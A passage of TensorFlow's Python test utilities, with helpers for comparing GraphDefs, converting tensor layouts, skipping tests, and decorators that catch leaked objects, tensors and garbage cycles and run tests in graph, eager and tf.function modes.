def is_ubsan_enabled():
"""Check if UBSAN is enabled."""
return pywrap_sanitizers.is_ubsan_enabled()
def _get_object_count_by_type(exclude=()):
return (
collections.Counter([type(obj).__name__ for obj in gc.get_objects()]) -
collections.Counter([type(obj).__name__ for obj in exclude]))
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or a empty string.
This method should only be used in tests written with `tf.test.TestCase`.
>>> class MyTest(tf.test.TestCase):
...
... def test_add_on_gpu(self):
... if not tf.test.is_built_with_gpu_support():
... self.skipTest("test is only applicable on GPU")
...
... with tf.device(tf.test.gpu_device_name()):
... self.assertEqual(tf.math.add(1.0, 2.0), 3.0)
"""
for x in device_lib.list_local_devices():
if x.device_type == "GPU":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tf_session.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(compat.as_bytes(_SHARDED_SAVE_OP_PATTERN),
attr_tensor_string_value)):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(compat.as_bytes(_TABLE_SHARED_NAME_PATTERN),
node.attr["shared_name"].s):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return _pywrap_util_port.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return _pywrap_util_port.IsBuiltWithROCm()
def IsBuiltWithXLA():
return _pywrap_util_port.IsBuiltWithXLA()
def IsBuiltWithNvcc():
return _pywrap_util_port.IsBuiltWithNvcc()
def GpuSupportsHalfMatMulAndConv():
return _pywrap_util_port.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return (_pywrap_util_port.IsMklEnabled() or
os.getenv("TF_ENABLE_ONEDNN_OPTS", "False").lower() in ["true", "1"])
def InstallStackTraceHandler():
_pywrap_stacktrace_handler.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 3-, 4-, or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {3: [0, 2, 1], 4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
@contextlib.contextmanager
def skip_if_error(test_obj, error_type, messages=None):
"""Context manager to skip cases not considered failures by the tests.
Note that this does not work if used in setUpClass/tearDownClass.
Usage in setUp/tearDown works fine just like regular test methods.
Args:
test_obj: A test object provided as `self` in the test methods; this object
is usually an instance of `unittest.TestCase`'s subclass and should have
`skipTest` method.
error_type: The error type to skip. Note that if `messages` are given, both
`error_type` and `messages` need to match for the test to be skipped.
messages: Optional, a string or list of strings. If `None`, the test will be
skipped if `error_type` matches what is raised; otherwise, the test is
skipped if any of the `messages` is contained in the message of the error
raised, and `error_type` matches the error raised.
Yields:
Nothing.
"""
if messages:
messages = nest.flatten(messages)
try:
yield
except error_type as e:
if not messages or any(message in str(e) for message in messages):
test_obj.skipTest("Skipping error: {}: {}".format(type(e), str(e)))
else:
raise
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def enable_output_all_intermediates(fn):
"""Force-enable outputing all intermediates from functional control flow ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
output_all_intermediates_old = \
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = \
output_all_intermediates_old
return wrapper
def assert_no_new_pyobjects_executing_eagerly(func=None, warmup_iters=2):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
Args:
func: The function to test.
warmup_iters: The numer of warmup iterations, excluded from measuring.
Returns:
The wrapped function performing the test.
"""
def wrap_f(f):
def decorator(self, *args, **kwargs):
"""Warms up, gets object counts, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various
# versions of python2.7.x.
for _ in range(warmup_iters):
f(self, *args, **kwargs)
# Since we aren't in the normal test lifecycle, we need to manually run
# cleanups to clear out their object references.
self.doCleanups()
# Some objects are newly created by _get_object_count_by_type(). So
# create and save as a dummy variable to include it as a baseline.
obj_count_by_type = _get_object_count_by_type()
gc.collect()
# Make sure any registered functions are cleaned up in the C++ runtime.
registered_function_names = context.context().list_function_names()
# unittest.doCleanups adds to self._outcome with each unwound call.
# These objects are retained across gc collections so we exclude them
# from the object count calculation.
obj_count_by_type = _get_object_count_by_type(
exclude=gc.get_referents(self._outcome.errors,
self._outcome.skipped))
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, *args, **kwargs)
# Since we aren't in the normal test lifecycle, we need to manually run
# cleanups to clear out their object references.
self.doCleanups()
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
obj_count_by_type = (
_get_object_count_by_type(
exclude=gc.get_referents(self._outcome.errors,
self._outcome.skipped)) -
obj_count_by_type)
# There should be no newly registered functions hanging around.
leftover_functions = (
context.context().list_function_names() - registered_function_names)
assert not leftover_functions, (
"The following functions were newly created: %s" %
leftover_functions)
# In some cases (specifically on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert not obj_count_by_type, (
"The following objects were newly created: %s" %
str(obj_count_by_type))
gc.enable()
return decorator
if func is None:
return wrap_f
else:
return wrap_f(func)
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except (ReferenceError, AttributeError):
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, denylist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(denylist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in denylist:
if b is obj:
return "<test code>"
if obj is denylist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, denylist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
denylist: same as denylist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, denylist):
return "{}{}".format(get_ignore_reason(obj, denylist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, denylist):
"""Builds a reference graph as <referrer> -> <list of referents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
denylist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
denylist = denylist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, denylist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, denylist)
reprs[r_id] = describe(r, denylist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
for i, obj in enumerate(gc.garbage[previous_garbage:]):
# Known false positive for ast.fix_missing_locations.
if getattr(obj, "__module__", "") == "ast":
new_garbage -= 3
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
sort_by_key = lambda k: k[0]
combinations = []
for key, values in sorted(kwargs.items(), key=sort_by_key):
if not isinstance(values, list):
values = [values]
combinations.append([(key, value) for value in values])
return [OrderedDict(result) for result in itertools.product(*combinations)]
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
[("testcase_name", "_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
WARNING: This decorator can only be used in test cases that statically checks
generated graph. Attempting to evaluate graph or function results via.
session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
return ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_async_and_sync_mode(f):
"""Execute the test in async mode and sync mode."""
@parameterized.named_parameters([("Async", True), ("", False)])
@functools.wraps(f)
def decorator(self, async_mode, *args, **kwargs):
if async_mode:
with context.execution_mode(context.ASYNC):
f(self, *args, **kwargs)
else:
with context.execution_mode(context.SYNC):
f(self, *args, **kwargs)
return decorator
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return tf_decorator.make_decorator(f, decorated)
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.inside_function():
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
